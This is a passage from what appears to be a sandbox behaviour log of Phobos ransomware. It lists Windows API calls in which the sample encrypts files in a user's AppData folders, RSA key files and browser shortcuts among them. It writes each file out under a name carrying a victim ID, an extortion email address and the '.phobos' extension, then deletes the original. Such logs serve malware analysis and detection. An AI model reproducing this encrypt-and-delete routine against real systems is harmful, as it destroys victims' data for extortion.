(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol")) returned 1 [0199.084] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0199.084] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0199.085] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=45) returned 1 [0199.085] CloseHandle (hObject=0x118) returned 1 [0199.086] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f")) returned 0x2024 [0199.086] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.086] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0199.086] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.086] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.086] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0199.087] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa329e8) returned 1 [0199.087] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.087] ReadFile (in: hFile=0x118, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x2d, lpOverlapped=0x0) returned 1 [0199.087] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x30, dwBufLen=0x30 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x30) returned 1 [0199.088] WriteFile (in: hFile=0x16c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x30, lpOverlapped=0x0) returned 1 [0199.088] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328a8) returned 1 [0199.088] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.088] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0199.089] CryptDestroyKey (hKey=0xa328a8) returned 1 [0199.089] WriteFile (in: hFile=0x16c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0199.089] CryptDestroyKey (hKey=0xa329e8) returned 1 [0199.089] CloseHandle (hObject=0x118) returned 1 [0199.089] CloseHandle (hObject=0x16c) returned 1 [0199.089] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f")) returned 1 [0199.090] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0199.090] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0199.090] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=87) returned 1 [0199.091] CloseHandle (hObject=0x16c) returned 1 [0199.091] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f")) returned 0x2024 [0199.091] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.091] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0199.091] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.091] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.091] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0199.092] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa329e8) returned 1 [0199.092] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.092] ReadFile (in: hFile=0x16c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x57, lpOverlapped=0x0) returned 1 [0199.093] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0199.093] WriteFile (in: hFile=0x118, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x60, lpOverlapped=0x0) returned 1 [0199.093] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328a8) returned 1 [0199.093] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.093] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0199.093] CryptDestroyKey (hKey=0xa328a8) returned 1 [0199.093] WriteFile (in: hFile=0x118, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0199.094] CryptDestroyKey (hKey=0xa329e8) returned 1 [0199.094] CloseHandle (hObject=0x16c) returned 1 [0199.094] CloseHandle (hObject=0x118) returned 1 [0199.094] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f")) returned 1 [0199.095] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0199.095] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0199.099] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=61) returned 1 [0199.099] CloseHandle (hObject=0x118) returned 1 [0199.099] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f")) returned 0x2024 [0199.099] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.099] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0199.099] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.099] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.099] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0199.100] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa329e8) returned 1 [0199.100] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.100] ReadFile (in: hFile=0x118, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x3d, lpOverlapped=0x0) returned 1 [0199.101] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0199.101] WriteFile (in: hFile=0x16c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x40, lpOverlapped=0x0) returned 1 [0199.102] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328a8) returned 1 [0199.102] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.102] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0199.102] CryptDestroyKey (hKey=0xa328a8) returned 1 [0199.102] WriteFile (in: hFile=0x16c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0199.102] CryptDestroyKey (hKey=0xa329e8) returned 1 [0199.102] CloseHandle (hObject=0x118) returned 1 [0199.102] CloseHandle (hObject=0x16c) returned 1 [0199.102] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f")) returned 1 [0199.103] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0199.103] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\google chrome.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0199.104] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2281) returned 1 [0199.104] CloseHandle (hObject=0x16c) returned 1 [0199.104] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\google chrome.lnk")) returned 0x20 [0199.104] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\google chrome.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.104] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\google chrome.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0199.104] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.104] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.104] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\google chrome.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0199.105] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa329e8) returned 1 [0199.105] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.105] ReadFile (in: hFile=0x16c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x8e9, lpOverlapped=0x0) returned 1 [0199.118] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x8f0, dwBufLen=0x8f0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x8f0) returned 1 [0199.118] WriteFile (in: hFile=0x118, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x8f0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x8f0, lpOverlapped=0x0) returned 1 [0199.118] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0199.118] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.119] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0199.119] CryptDestroyKey (hKey=0xa32be8) returned 1 [0199.119] WriteFile (in: hFile=0x118, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0199.119] CryptDestroyKey (hKey=0xa329e8) returned 1 [0199.119] CloseHandle (hObject=0x16c) returned 1 [0199.119] CloseHandle (hObject=0x118) returned 1 [0199.119] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\google chrome.lnk")) returned 1 [0199.120] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0199.120] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0199.121] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=290) returned 1 [0199.121] CloseHandle (hObject=0x118) returned 1 [0199.121] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 